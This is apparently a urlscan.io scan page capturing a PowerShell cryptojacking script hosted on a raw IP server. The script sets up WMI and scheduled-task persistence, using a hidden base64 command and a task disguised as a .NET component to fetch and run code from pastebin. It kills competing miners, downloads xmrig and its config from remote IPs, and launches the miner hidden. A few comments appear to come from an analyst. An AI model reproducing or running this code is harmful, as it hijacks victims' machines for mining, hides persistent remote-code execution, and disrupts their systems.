27.1.1.34
Open in
urlscan Pro
27.1.1.34
Public Scan
URL:
http://27.1.1.34:8080/docs/cgi/wi.txt
Submission: On August 03 via manual from DE — Scanned from DE
Submission: On August 03 via manual from DE — Scanned from DE
Form analysis
0 forms found in the DOMText Content
Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'Eventlogers'} |Remove-WmiObject $current=[System.Security.Principal.WindowsIdentity]::GetCurrent().Name -replace "((.*)\\)", "" if([System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Contains("SYSTEM")){ Try { Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='Eventlogers'" | Remove-WmiObject -Verbose Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='Eventlogers'" | Remove-WmiObject -Verbose Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%subscription%'" | Remove-WmiObject -Verbose Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object {$_.filter -notmatch 'Eventlogers'} |Remove-WmiObject $filterName = 'Eventlogers' $consumerName = 'Eventlogers' $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop $Arg =@{ Name=$consumerName CommandLineTemplate="C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -windowstyle hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBiAGkAbgAuAGMAbwBtAC8AcgBhAHcALwBGADcAZQBDAEcATABRAFUAJwApAA==" } $WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments $Arg Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer} } Catch { } } Else{ schtasks /create /sc MINUTE /mo 5 /tn "\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32" /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''https://pastebin.com/raw/V5WR8U2t'''))'" /F /ru System } Function Killer { # Remove known miners by services names $SrvName = "dom_miner", "SVSHost", "Microsoft Telemetry", "lsass", "Microsoft", "system", "Oracleupdate", "CLR", "sysmgt", "\gm", "WmdnPnSN", "cli_optimization_v2.0.55727_64","cli_optimization_v2.0.55727_32","Oracle Java System Service","Oracle Java System Services", "Sougoudl", "Nationaaal", "Natimmonal", "Nationaloll", "Nationalmll", "Samserver", "RpcEptManger", "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq","aspnet_state" foreach ($Srv in $SrvName) { # Set-Service -Name $Srv -StartupType Disabled -ErrorAction SilentlyContinue # Stop-Service -Name $Srv -Force -ErrorAction SilentlyContinue $Null = SC.exe Config $Srv Start= Disabled $Null = SC.exe Stop $Srv $Null = SC.exe Delete $Srv } # Remove known miners by scheduled tasks names $TaskName = "dsm", "dom", "Mysa2", "Mysa3", "ok", "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service","\Microsoft\Windows\Bluetooth\UpdateDeviceTask","\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization", "\Microsoft\Windows\.NET Framework\.NET Framework NGEN v4.0.50319 Critical","\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678156-433529325-2142214268-1138","\Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678155-433529325-2142214968-1138","\Microsoft\Windows\DiskCleanup\SlientDefragDisks","\Microsoft\Windows\EDP\EDP App Lock Task","\Microsoft\Windows\EDP\EDP App Update Cache", "\Microsoft\Windows\MobilePC\DetectPC","\Microsoft\Windows\UPnP\UPnPHost","\Microsoft\Windows\UPnP\UPnPClient","\Microsoft\Windows\Shell\WinShell","\Microsoft\Windows\MUI\LPupdate","\Microsoft\Windows\DiskDiagnostic\Microsoft Windows Disk Diagnostic","\Microsoft\Windows\Shell\WindowsShellUpdate", "Oracle Products Reporter", "Update service for products", "Update service for Oracle productsm", "Update service for Windows Service", "oka", "my1", "MicrosoftsWindowsy", "UAC", "Update service for Oracle productsoo","Microsoft .NET Framework NGEN v2.0.55727_x32" foreach ($Task in $TaskName) { SchTasks.exe /Delete /TN $Task /F 2> $Null } # Terminates and removes miners by indicative command line arguments $CmdLine = Get-WmiObject -Class Win32_Process | Where-Object { $_.CommandLine -like '*pool.monero.hashvault.pro*' -Or $_.CommandLine -like '*blazepool*' -Or $_.CommandLine -like '*blockmasters*' -Or $_.CommandLine -like '*blockmasterscoins*' -Or $_.CommandLine -like '*bohemianpool*' -Or $_.CommandLine -like '*cryptmonero*' -Or $_.CommandLine -like '*cryptonight*' -Or $_.CommandLine -like '*crypto-pool*' -Or $_.CommandLine -like '*--donate-level*' -Or $_.CommandLine -like '*dwarfpool*' -Or $_.CommandLine -like '*hashrefinery*' -Or $_.CommandLine -like '*hashvault.pro*' -Or $_.CommandLine -like '*iwanttoearn.money*' -Or $_.CommandLine -like '*--max-cpu-usage*' -Or $_.CommandLine -like '*mine.bz*' -Or $_.CommandLine -like '*minercircle.com*' -Or $_.CommandLine -like '*minergate*' -Or $_.CommandLine -like '*miners.pro*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*minexmr*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*mineXMR*' -Or $_.CommandLine -like '*miningpoolhubcoins*' -Or $_.CommandLine -like '*mixpools.org*' -Or $_.CommandLine -like '*mixpools.org*' -Or $_.CommandLine -like '*monero*' -Or $_.CommandLine -like '*monero*' -Or $_.CommandLine -like '*monero.lindon-pool.win*' -Or $_.CommandLine -like '*moriaxmr.com*' -Or $_.CommandLine -like '*mypool.online*' -Or $_.CommandLine -like '*nanopool.org*' -Or $_.CommandLine -like '*nicehash*' -Or $_.CommandLine -like '*-p x*' -Or $_.CommandLine -like '*pool.electroneum.hashvault.pro*' -Or $_.CommandLine -like '*pool.xmr*' -Or $_.CommandLine -like '*poolto.be*' -Or $_.CommandLine -like '*prohash*' -Or $_.CommandLine -like '*prohash.net*' -Or $_.CommandLine -like '*ratchetmining.com*' -Or $_.CommandLine -like '*slushpool*' -Or $_.CommandLine -like '*stratum+*' -Or $_.CommandLine -like '*suprnova.cc*' -Or $_.CommandLine -like '*teracycle.net*' -Or $_.CommandLine -like '*usxmrpool*' -Or $_.CommandLine -like '*viaxmr.com*' -Or $_.CommandLine -like '*xmrpool*' -Or $_.CommandLine -like '*yiimp*' -Or $_.CommandLine -like '*zergpool*' -Or $_.CommandLine -like '*zergpoolcoins*' -Or $_.CommandLine -like '*zpool*' } if ($CmdLine -ne $Null) { $PathArray = @() foreach ($m in $CmdLine) { $evid = $($m.ProcessId) # The line below is wasn't originally commented, it white-lists the miner itself # if (($evid -eq $PId) -or ($evid -eq $minerPId)) { continue } Write-Host "[i] Miner PId: $evid" Get-Process -Id $evid | Stop-Process -Force # Create an array of competing miners' paths to remove $Path = $($m.Path) if ($Path -eq "$Env:WinDir\System32\cmd.exe" -Or $Path -eq "$Env:WinDir\SysWOW64\cmd.exe" -Or $Path -eq "$Env:WinDir\Explorer.exe" -Or $Path -eq "$Env:WinDir\Notepad.exe") { continue } if ($PathArray -NotContains $Path) { $PathArray += $Path } } } # Uses netstat to list all "ESTABLISHED" connections # Afterwards it filters lines containing ports associated with miners and terminates the process using it [array]$psids = Get-Process -Name PowerShell | Sort CPU -Descending | ForEach-Object {$_.Id} $tcpconn = NetStat -anop TCP if ($psids -ne $null) { foreach ($t in $tcpconn) { $line = $t.split(' ')| ? {$_} if ($line -eq $null) { continue } if (($psids[0] -eq $line[-1]) -and $t.contains("ESTABLISHED") -and ($t.contains(":13333 ") -or $t.contains(":443 ") -or $t.contains(":1111") -or $t.contains(":2222") -or $t.contains(":4444") -or $t.contains(":5555") -or $t.contains(":6666") -or $t.contains(":7777") -or $t.contains(":8888") -or $t.contains(":9999") -or $t.contains(":14433") -or $t.contains(":14444") -or $t.contains(":45560") -or $t.contains(":65333"))) { $evid = $line[-1] # The line below is wasn't originally commented, it white-lists the miner itself # if (($evid -eq $PId) -or ($evid -eq $minerPId)) { continue } Write-Host "[i] Miner PId: $evid" Get-Process -Id $evid | Stop-Process -Force } } } # Uses netstat to list all "ESTABLISHED" connections # Afterwards it lists processes connecting to remote ports associated with miners and terminates it foreach ($t in $tcpconn) { $line = $t.split(' ')| ? {$_} if (!($line -is [array])) { continue } if (($line[-3] -ne $null) -and $t.contains("ESTABLISHED") -and ($line[-3].contains(":1111") -or $line[-3].contains(":2222") -or $line[-3].contains(":13333") -or $line[-3].contains(":4444") -or $line[-3].contains(":5555") -or $line[-3].contains(":6666") -or $line[-3].contains(":6633") -or $line[-3].contains(":7777") -or $line[-3].contains(":8888") -or $line[-3].contains(":9980") -or $line[-3].contains(":9999") -or $line[-3].contains(":13333") -or $line[-3].contains(":14433") -or $line[-3].contains(":14444") -or $line[-3].contains(":16633") -or $line[-3].contains(":16666") -or $line[-3].contains(":45560") -or $line[-3].contains(":65333") -or $line[-3].contains(":55335") -or $line[-3].contains(":5790"))) { $evid = $line[-1] # The line below is wasn't originally commented, it white-lists the miner itself # if (($evid -eq $PId) -or ($evid -eq $minerPId)) { continue } Write-Host "[i] Miner PId: $evid" Get-Process -Id $evid | Stop-Process -Force } } # Remove known miners by known process names $Miner = "LogBack", "xmrig*", "minerd", "svhostd", "notepad", "dom", "upgeade", "auto-upgeade", "svshost","pythonhs", "helper", "minerd", "MinerGate", "Carbon", "yamm1", "upgeade", "auto-upgeade", "svshost","kmkww","taskhostex", "SystemIIS", "SystemIISSec", 'WindowsUpdater*', "WindowsDefender*", "update", "dsm", "kkrrr", 'kkwsx', "sysupdate", "wxm", "GoogleServer", "wmice", 'windown', "SystemManagement","checked1", "networkservice", "pythonww", "carss", "service", "csrsc", "cara", "javaupd", "gxdrv", "lsmosee", "secuams", "SQLEXPRESS_X64_86", "Calligrap", "Sqlceqp", "Setting", "Uninsta", "conhoste","xdxd","pythonhs","network02" foreach ($m in $Miner) { Get-Process -Name $m -ErrorAction SilentlyContinue | Stop-Process -Force } } Killer cmd /c reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Image" "File" "Execution" "Options\javae.exe /f cmd.exe /c del /f /q C:\Windows\temp\wxm.exe cmd.exe /c mkdir C:\Windows\temp\wxm.exe cmd.exe /c del /f /q C:\Windows\temp\LogBack.exe cmd.exe /c del /f /q C:\Windows\temp\svhostd.exe cmd.exe /c mkdir C:\Windows\temp\LogBack.exe cmd.exe /c del /f /q C:\ProgramData\Oracle\Java\java.exe cmd.exe /c mkdir C:\Windows\temp\svhostd.exe cmd.exe /c rd /s /q C:\ProgramData\Oracle\Java\.oracle_jre_usage cmd.exe /c mkdir C:\ProgramData\Oracle\Java\.oracle_jre_usage\java.exe cmd.exe /c attrib -s -h -r %tmp%\sysupdate.exe cmd.exe /c attrib -s -h -r %temp%\sysupdate.exe cmd.exe /c del /f /q %tmp%\sysupdate.exe cmd.exe /c mkdir %tmp%\sysupdate.exe cmd.exe /c md %tmp%\sysupdate.exe cmd.exe /c mkdir %temp%\sysupdate.exe cmd.exe /c md %temp%\sysupdate.exe cmd.exe /c attrib +s +h +r %tmp%\sysupdate.exe cmd.exe /c attrib +s +h +r %temp%\sysupdate.exe $ne = $MyInvocation.MyCommand.Path $miner_url = "http://182.237.104.13:8081/xmrig.exe" $miner_name = "javae" $miner_cfg_url = "http://27.1.1.34:8080/docs/cgi/config.json" $miner_cfg_name = "config.json" $killmodule_url = "http://27.1.1.34:8080/examples/clean.bat" $killmodule_name = "clean.bat" $miner_path = "$env:TMP\javae.exe" $miner_cfg_path = "$env:TMP\config.json" $killmodule_path = "$env:TMP\clean.bat" function Update($url,$path,$proc_name) { Get-Process -Name $proc_name | Stop-Process Remove-Item $path Try { $vc = New-Object System.Net.WebClient $vc.DownloadFile($url,$path) } Catch { Write-Output "donwload with backurl" } } if((Test-Path $killmodule_path)) { Update $killmodule_url $killmodule_path $killmodule_name } else { Write-Output "download clean fail" } if(!(Get-Process $miner_name -ErrorAction SilentlyContinue)) { cmd.exe /c attrib -s -h -r %tmp%\config.json cmd.exe /c attrib -s -h -r C:\Windows\temp\config.json cmd.exe /c rd /s /q %tmp%\config.json cmd.exe /c rd /s /q C:\Windows\temp\config.json wmic process where "ExecutablePath like 'c:\\windows\\temp\\%'" delete wmic process where "ExecutablePath like 'C:\\Users\\Administrator\\AppData\\Local\\Temp\\%'" delete wmic process where "ExecutablePath like 'C:\\Users\\$current\\AppData\\Local\\Temp\\%'" delete Update $miner_url $miner_path $miner_name Update $miner_cfg_url $miner_cfg_path $miner_cfg_name cmd.exe /c attrib +R +S +H %tmp%\config.json cmd.exe /c attrib +R +S +H C:\Windows\temp\config.json Start-Process $miner_path -windowstyle hidden } else { Write-Output "Miner Running" } wmic process where "ExecutablePath like 'C:\\Windows\\Fonts\\%'" delete wmic process where "ExecutablePath like 'C:\\Windows\\SysWOW64\\%'" delete wmic process where "ExecutablePath like 'C:\\ProgramData\\Oracle\\Java\\%'" delete wmic process where "ExecutablePath like 'C:\\Windows\\Microsoft.NET\\Framework64\\%'" delete wmic process where "ExecutablePath like 'C:\\ProgramData\\nTNLLnvWzl\\%'" delete Start-Process cmd.exe "/c $killmodule_path" -windowstyle hidden cmd /c taskkill /f /im powershell.exe